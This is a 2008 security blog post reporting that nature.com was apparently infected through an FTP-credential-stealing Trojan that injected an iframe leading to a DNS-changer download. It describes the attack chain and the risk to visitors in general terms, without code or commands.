« Silent love China | Main | Attackers Grabbing Long Tail of the Web »

Nature.com and the Weakest Link

Recently, ScanSafe STAT investigated blocks on the nature.com website. Nature is an internationally recognized journal of research articles pertaining to science and medicine. Turns out, Nature may also be a victim of the FerTP Trojan, which scans infected machines looking for FTP login credentials, then uses those credentials to log onto any websites found and append a malicious iframe to the default loading pages. That iframe loads exploit code from a path on the money2008.org domain, hosted in Israel. The exploit code attempts to download malware from 89.149.253.17, hosted in Germany. Of course, just because a site is hosted in a particular country it doesn't mean the attackers are from that country. The web creates an international playing field and the actual attackers could be anywhere.

The malware contained on 89.149.253.17 is a DNS changer which can then forcibly (and surreptitiously) redirect the user to sites other than they expected. And because the DNS changer can resolve any domain to any IP, the effect would be seamless - and serious. For example, an infected user that typed in the URL for the bank website could have it resolved to an IP not owned by the bank. That IP could (and likely would) host a look-alike site for the legitmate bank and steal their account credentials when they attempted to login.

There's an old saying in the industry that you are only as secure as your weakest link. In this case, presumably, that weakest link was a workstation somewhere within Nature Publishing Group. And because of their considerable web presence, that single Trojan infection was able to impact an untold number of users who might have visited nature.com over the past couple of days. Within Wikipedia, nature.com is one of the top 500 linked sites (#333 according to Newswriter). And according to Quantcast, Nature.com is "a top 5,000 site that reaches over 877K U.S. monthly uniques". That would be about 29.3k unique visitors each day that risked exposure during the compromise (which fortunately has since been remedied).

Who's your weakest link?

Posted on Tuesday, May 13, 2008 at 09:55AM by Registered CommenterMary Landesman | CommentsPost a Comment

Reader Comments

There are no comments for this journal entry. To create a new comment, use the form below.

PostPost a New Comment

Enter your information below to add a new comment.

My response is on my own website »
Author Email (optional):
Author URL (optional):
Post:
 
Some HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>
Alert
Comment Moderation Enabled
Your comment will not appear until it has been cleared by a website editor.